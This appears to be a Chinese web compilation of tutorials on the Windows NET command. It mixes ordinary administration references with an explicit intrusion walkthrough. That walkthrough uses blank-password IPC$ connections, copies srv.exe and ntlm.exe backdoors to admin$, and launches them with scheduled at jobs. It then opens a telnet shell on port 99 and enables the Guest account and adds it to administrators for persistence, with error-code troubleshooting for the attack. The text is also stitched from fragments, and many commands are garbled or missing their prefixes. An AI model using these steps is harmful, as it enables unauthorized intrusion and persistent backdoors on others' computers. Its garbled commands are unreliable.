命令格式:NET PASSWORD computer | /DOMAIN:name 〔user 〔oldpassword 〔newpassword〕〕〕
网管:NET命令的另类用法
在一次帮助用户维护网络的时候,偶然发现Windows XP操作系统中的NET系列命令中多了一个Net User命令。经过仔细推敲和演练发现Net User不仅可以用来添加或修改用户或者显示用户信息,还可以对用户设置不同的限制,比控制面板中的“用户账户”的应用效果要好多了,大家不妨试试。
Net User命令是一个DOS命令,必须在Windows XP下的MS-DOS模式下运行,所以首先要进入MS-DOS模式:选择“开始”菜单的“附件”选项的子选项“命令提示符”,或在“开始”菜单的“运行”选项(快捷键为Win+R)中输入“cmd.exe”,进入MS-DOS模式。以下功能都基于此模式下。
建立一个普通新用户
在MS-DOS提示符中输入如下命令:“net user john 123 /add”,回车。即可新建一个名为“John”,密码为“123”的新用户。Add参数表示新建用户。
值得注意的是:用户名最多可有 20 个字符,密码最多可有 127 个字符。
建立一个登录时间受限制的用户
用以下方法可实现对电脑使用时间的控制。比如,需要建立一个John的用户账号,密码为“123”,登录权限从星期一到星期五的早上八点到晚上十点和双休日的晚上七点到晚上九点。
1. 12小时制可键入如下命令:“net user john 123 /add /times:monday-friday,8AM-10PM;saturday-sunday,7PM-9PM”,回车确定即可
2. 24小时制可键入如下命令:“net user john 123 /add /times:M-F,8:00-22:00;Sa-Su,19:00-21:00”,回车确定即可。
值得注意的是:Time的增加值限制为1小时。对于Day值,可以用全称或缩写(即 M、T、W、Th、F、Sa、Su)。可以使用12小时或24小时时间表示法。对于12小时表示法,请使用AM、PM或A.M.、P.M.。All值表示用户始终可以登录;空值(空白)意味着用户永远不能登录。用逗号分隔日期和时间,用分号分隔日期和时间单元(例如,M,4AM-5PM;T,1PM-3PM)。指定时间时不要使用空格。
另外,Passwordchg:{yes | no}参数可用来指定用户是否可以更改自己的密码,默认设置为 Yes。
限定用户的使用时间
Net User命令还可以使用参数Expires:{{mm/dd/yyyy | dd/mm/yyyy | mmm,dd ,yyyy} | never} 使用户账号根据指定的Date过期限定用户。过期日期可以是 [mm/dd/yyyy]、[dd/mm/yyyy] 或[mmm,dd,yyyy]格式。它取决于国家(地区)代码。用户账号在指定日期开始时到期。对于月份值,可以使用数字、全称或三个字母的缩写(即Jan、Feb、Mar、Apr、May、Jun、Jul、Aug、Sep、Oct、Nov、Dec)。对于年份值,可以使用两位数或四位数;使用逗号和斜杠分隔日期的各部分;不要使用空格。
例如:要限定用户账号John到2004年11月5日到期,可键入如下命令:“net user john /expires:Nov/5/2004”,回车确定即可。
查看用户信息、修改已有用户密码和删除用户
如果在没有参数的情况下使用,则Net User将显示计算机上用户的列表,如键入以下命令:“net user”,回车即可显示该系统的所有用户。
如果键入:“net user john”,回车则可显示用户John的信息。
若键入命令:“net user john 123456 /add”,回车确定,则强制将用户John(John为已有用户)的密码更改为123456。
若键入命令:“net user john /delete”,回车确定则可删除用户John。
关于Net User命令的用法就介绍这么多,其实像这样的技巧很多,需要大家不断探索,相互交流。
(2)/domain〔:name〕指定要与其时间同步的域。
(3)/set使本计算机时钟与指定计算机或域的时钟同步。
下面的这4个参数是相关的,所以一起介绍
(5)Net Start
作 用:启动服务,或显示已启动服务的列表。
⑹ NET命令的用法
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车。
在这里,我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。如图7。
net use
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \\IP\IPC$ "password" /user:"name")。
建立了IPC$连接后,呵呵,就可以上传文件了: nc.exe \\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。
net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。
net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
2,net user abcd /del,将用户名为abcd的用户删除。
3,net user abcd /active:no,将用户名为abcd的用户禁用。
4,net user abcd /active:yes,激活用户名为abcd的用户。
5,net user abcd,查看用户名为abcd的用户的情况,如图10。
net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add。
现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员。
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time \\IP
⑺ dos中怎样使用net命令
dos下的net命令使用大全A:NET VIEW作用:显示域列表、计算机列表或指定计算机的共享资源列表。命令格式:net view [\\computername | /domain[:domainname]]参数介绍: (1)键入不带参数的net view显示当前域的计算机列表。(2)\\computername 指定要查看其共享资源的计算机。(3)/domain[:domainname]指定要查看其可用计算机的域。简单事例:(1)net view \\YFANG查看YFANG的共享资源列表。(2)net view /domain:LOVE查看LOVE域中的机器列表。B:NET USER作用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。命令格式:net user [username [password | *] [options]] [/domain]参数介绍:(1)键入不带参数的net user查看计算机上的用户帐号列表。(2)username添加、删除、更改或查看用户帐号名。(3)password为用户帐号分配或更改密码。(4)*提示输入密码。(5)/domain在计算机主域的主域控制器中执行操作。简单事例:net user yfang查看用户YFANG的信息(C)NET USE作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。命令格式:net use [devicename | *] [\\computername\sharename[\volume]][password | *]] [/user:[domainname\]username] [[/delete] |[/persistent:{yes | no}]]参数介绍: (1) 键入不带参数的net use列出网络连接。(2) devicename指定要连接到的资源名称或要断开的设备名称。(3) \\computername\sharename服务器及共享资源的名称。(4) password访问共享资源的密码。(5) *提示键入密码。(6) /user指定进行连接的另外一个用户。(7) domainname指定另一个域。(8) username指定登录的用户名。(9) /home将用户连接到其宿主目录。(10) /delete取消指定网络连接。(11)/persistent控制永久网络连接的使用。简单事例: (1)net use e: \\YFANG\TEMP将\\YFANG\TEMP目录建立为E盘(2)net use e: \\YFANG\TEMP /delete断开连接(D)NET TIME作用:使计算机的时钟与另一台计算机或域的时间同步。命令格式:net time [\\computername | /domain[:name]] [/set]参数介绍:(1)\\computername要检查或同步的服务器名。(2)/domain[:name]指定要与其时间同步的域。(3)/set使本计算机时钟与指定计算机或域的时钟同步。(E)Net Start作用:启动服务,或显示已启动服务的列表。命令格式:net start service(F)Net Pause作用:暂停正在运行的服务。命令格式:net pause service(G)Net Continue作用:重新激活挂起的服务。命令格式:net continue service(H)NET STOP作用:停止 Windows NT 网络服务。命令格式:net stop service参数介绍: (1)alerter(警报)(2)client service for netware(Netware 客户端服务)(3)clipbook server(剪贴簿服务器)(4)computer browser(计算机浏览器)(5)directory replicator(目录复制器)(6)ftp publishing service (ftp )(ftp 发行服务)(7)lpdsvc(8)net logon(网络登录)(9)network dde(网络 dde)(10)network dde dsdm(网络 dde dsdm)(11)network monitor agent(网络监控代理)(12)nt lm security support provider(NT LM 安全性支持提供)(13)ole(对象链接与嵌入)(14)remote access connection manager(远程访问连接管理器)(15)remote access isnsap service(远程访问 isnsap 服务)(16)remote access server(远程访问服务器)(17)remote procere call (rpc) locator(远程过程调用定位器)(18)remote procere call (rpc) service(远程过程调用服务)(19)schele(调度)(20)server(服务器)(21)simple tcp/ip services(简单 TCP/IP 服务)(22)snmp(23)spooler(后台打印程序)(24)tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)(25)ups(26)workstation(工作站)(27)messenger(信使)(28)dhcp client(29)eventlog以下这些SERVICE只能在NT SERVER上使用 (1)file server for macintosh(2)gateway service for netware(3)microsoft dhcp server(4)print server for macintosh(5)remoteboot(6)windows internet name service(I) Net Statistics作用:显示本地工作站或服务器服务的统计记录。命令格式:net statistics [workstation | server]参数介绍:(1)键入不带参数的net statistics列出其统计信息可用的运行服务。(2)workstation显示本地工作站服务的统计信息。(3)server显示本地服务器服务的统计信息。简单事例:net statistics server | more显示服务器服务的统计信息(J) Net Share作用:创建、删除或显示共享资源。命令格式:net share sharename=drive:path [/users:number | /unlimited][/remark:"text"]参数介绍:(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。(2)sharename是共享资源的网络名称。(3)drive:path指定共享目录的绝对路径。(4)/users:number设置可同时访问共享资源的最大用户数。(5)/unlimited不限制同时访问共享资源的用户数。(6/remark:"text "添加关于资源的注释,注释文字用引号引住。简单事例:(1) net share mylove=c:\temp /remark:"my first share"以mylove为共享名共享C:\temp(2)net share mylove /delete停止共享mylove目录(K) Net Session作用:列出或断开本地计算机和与之连接的客户端的会话,也可以写为net sessions或netsess。命令格式:net session [\\computername] [/delete]参数介绍:(1)键入不带参数的net session显示所有与本地计算机的会话的信息。(2)\\computername标识要列出或断开会话的计算机。(3)/delete结束与\\computername计算机会话并关闭本次会话.简单事例:net session \\YFANG要显示计算机名为YFANG的客户端会话信息列表。(L) Net Send作用:向网络的其他用户、计算机或通信名发送消息。命令格式:net send {name | * | /domain[:name] | /users} message参数介绍:(1)name要接收发送消息的用户名、计算机名或通信名。(2)*将消息发送到组中所有名称。(3)/domain[:name]将消息发送到计算机域中的所有名称。(4)/users将消息发送到与服务器连接的所有用户。(5)message作为消息发送的文本。简单事例:net send /users server will shutdown in 5 minutes.给所有连接到服务器的用户发送消息(M) Net Print作用:显示或控制打印作业及打印队列。命令格式:net print [\\computername ] job# [/hold | /release | /delete]参数介绍:(1)computername共享打印机队列的计算机名。(2)sharename打印队列名称。(3)job#在打印机队列中分配给打印作业的标识号。(4)/hold使用 job# 时,在打印机队列中使打印作业等待。(5)/release释放保留的打印作业。(6/delete从打印机队列中删除打印作业。简单事例:net print \\YFANG\SEEME列出\\YFANG计算机上SEEME打印机队列的目录(N)Net Name作用:添加或删除消息名(有时也称别名),或显示计算机接收消息的名称列表。命令格式:net name [name [/add | /delete]]参数介绍:(1)键入不带参数的net name列出当前使用的名称。(2)name指定接收消息的名称。(3)/add将名称添加到计算机中。(4)/delete从计算机中删除名称。(O) Net Localgroup作用:添加、显示或更改本地组。命令格式:net localgroup groupname {/add [/comment:"text "] | /delete}[/domain]参数介绍:(1)键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。(2)groupname要添加、扩充或删除的本地组名称。(3)/comment: "text "为新建或现有组添加注释。(4)/domain在当前域的主域控制器中执行操作,否则仅在本地计算机上执行操作?(5)name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。(6)/add将全局组名或用户名添加到本地组中。(7)/delete从本地组中删除组名或用户名。简单事例:(1)net localgroup love /add将名为love的本地组添加到本地用户帐号数据库(2)net localgroup love显示love本地组中的用户(P) Net Group作用:在 Windows NT Server 域中添加、显示或更改全局组。命令格式:net group groupname {/add [/comment:"text "] | /delete} [/domain]参数介绍:(1)键入不带参数的net group显示服务器名称及服务器的组名称。(2)groupname要添加、扩展或删除的组。(3)/comment:"text "为新建组或现有组添加注释。(4)/domain在当前域的主域控制器中执行该操作,否则在本地计算机上执行操作(5)username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。(6)/add添加组或在组中添加用户名。(7)/delete删除组或从组中删除用户名。简单事例:net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组(Q) Net File作用:显示某服务器上所有打开的共享文件名及锁定文件数。命令格式:net file [id [/close]]参数介绍:(1)键入不带参数的net file获得服务器上打开文件的列表。(2)id文件标识号。(3)/close关闭打开的文件并释放锁定记录。(R) Net Config作用:显示当前运行的可配置服务,或显示并更改某项服务的设置。命令格式:net config [service [options]]参数介绍:(1)键入不带参数的net config显示可配置服务的列表。(2)service通过net config命令进行配置的服务(server或workstation)(3)options服务的特定选项。(S) Net Computer作用:从域数据库中添加或删除计算机。命令格式:net computer \\computername {/add | /del}参数介绍:(1)\\computername指定要添加到域或从域中删除的计算机。(2)/add将指定计算机添加到域。(3)/del将指定计算机从域中删除。简单事例:(1)net computer \\cc /add将计算机 cc 添加到登录域(T)Net Accounts作用:更新用户帐号数据库、更改密码及所有帐号的登录要求。命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length][/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number][/domain]参数介绍:(1)键入不带参数的net accounts显示当前密码设置、登录时限及域信息。(2)/forcelogoff:{minutes | no}设置当用户帐号或有效登录时间过期时(3)/minpwlen:length设置用户帐号密码的最少字符数。(4)/maxpwage:{days | unlimited}设置用户帐号密码有效的最大天数。(5)/minpwage:days设置用户必须保持原密码的最小天数。(6)/uniquepw:number要求用户更改密码时,必须在经过number次后才能重复使用与之相同的密码。(7)/domain在当前域的主域控制器上执行该操作。(8)/sync当用于主域控制器时,该命令使域中所有备份域控制器同步简单事例:net accounts /minpwlen:7将用户帐号密码的最少字符数设置为7以上介绍的是NET命令在WINNT下的基本用法,下面再来介绍一下NET命令在WIN98下的基本用法在WIN98中NET命令也有一些参数其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相同的有:(1)NET TIME命令(2)NET PRINT命令(3)NET USE命令(4)NET VIEW命令其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同的有:(1)NET START作用:启动相应的服务。(不能在DOS-WIN中用)命令格式:NET START [BASIC | NWREDIR | WORKSTATION | NETBIND | NETBEUI| NWLINK] [/LIST] [/YES] [/VERBOSE](2)NET STOP作用:停止相应的服务.(不能在DOS-WIN中用)命令格式:NET STOP [BASIC | NWREDIR | WORKSTATION | NETBEUI | NWLINK] [/YES]在WIN98中NET命令还有一些参数是在98下才有的,他们是:(1)NET DIAG作用:运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息命令格式:NET DIAGNOSTICS [/NAMES | /STATUS](2)NET INIT作用:不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)命令格式:NET INITIALIZE [/DYNAMIC](3)NET LOGOFF作用:断开连接的共享资源(不能在DOS-WIN中用)(4)NET LOGON作用:在WORKGROUP中登陆(不能在DOS-WIN中用)命令格式:NET LOGON [user [password | ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO](5)NET PASSWORD作用:更改你的网络登陆口令(不能在DOS-WIN中用)命令格式:NET PASSWORD \\computer | /DOMAIN:name [user [oldpassword[newpassword]]]
⑻ net 命令使用
分类: 电脑/网络 >> 程序设计 >> 其他编程语言
问题描述:
谁愿意给我详细讲一下 命令的用法
一定要用自己的话说
同时举几个例子
解析:
不是自己的话说的,我电脑里的资料....
1)建立空连接:
use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)
3)映射默认共享:
use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 use z: \\IP\c$
4)删除一个ipc$连接
use \\IP\ipc$ /del
5)删除共享映射
use c: /del 删除映射的c盘,其他盘类推
use * /del 删除全部,会有提示要求按y确认
3 查看远程主机的共享资源(但看不到默认共享)
view \\IP
4 查看本地主机的共享资源(可以看到本地的默认共享)
share
5 得到远程主机的用户名列表
nbtstat -A IP
6 得到本地主机的用户列表
user
7 查看远程主机的当前时间
time \\IP
8 显示本地主机当前服务
start
9 启动/关闭本地服务
start 服务名 /y
stop 服务名 /y
10 映射远程共享:
use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘
11 删除共享映射
use c: /del 删除映射的c盘,其他盘类推
use * /del /y删除全部
12 向远程主机复制文件
\路径\srv.exe \\IP\共享目录名,如:
ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内
13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
14 开启远程主机的tel
这里要用到一个小程序:opentel.exe,各大下载站点都有,而且还需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTel.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTel.exe \\*.*.*.* administrator "" 1 90
15 激活用户/加入管理员组
1 uesr account /active:yes
2 localgroup administrators account /add
16 关闭远程主机的tel
同样需要一个小程序:ResumeTel.exe
命令格式:ResumeTel.exe \\server account psw
试例如下:c:\>ResumeTel.exe \\*.*.*.* administrator ""
17 删除一个已建立的ipc$连接
use \\IP\ipc$ /del
九 经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1. C:\> use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
复制之前务必用 view \\IP这个命令看一下对方的共享情况
2. C:\> srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\> time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\> time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\>tel 127.0.0.1 99
这里会用到Tel命令吧,注意端口是99。Tel默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Tel上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Tel服务!这就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用" start tel"来开启Tel服务!
9. Tel 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\> user guest /active:yes
将对方的Guest用户激活
11. C:\> user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\> localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码
⑼ 常用的网络命令- net指令
net命令是一个命令行命令,net命令有很多函数用于使用和核查计算机之间的NetBIOS连接,可以查看我们的管理网络环境、服务、用户、登录等信息内容;可以在DOS环境下执行 NET/? 或 NET 或 NET HELP 获得使用帮助。所有Net命令接受选项/yes和/no(可缩写为/y和/n)
有关参数说明:
有关参数说明:
有关参数说明:
作用:使计算机的时钟与另一台计算机或域的时间同步。
命令格式: net time[\\computername|/domain[:name]][/set]
有关参数说明:
命令格式: net start service
命令格式: Net pause service
命令格式: Net continue service
命令格式: net stop service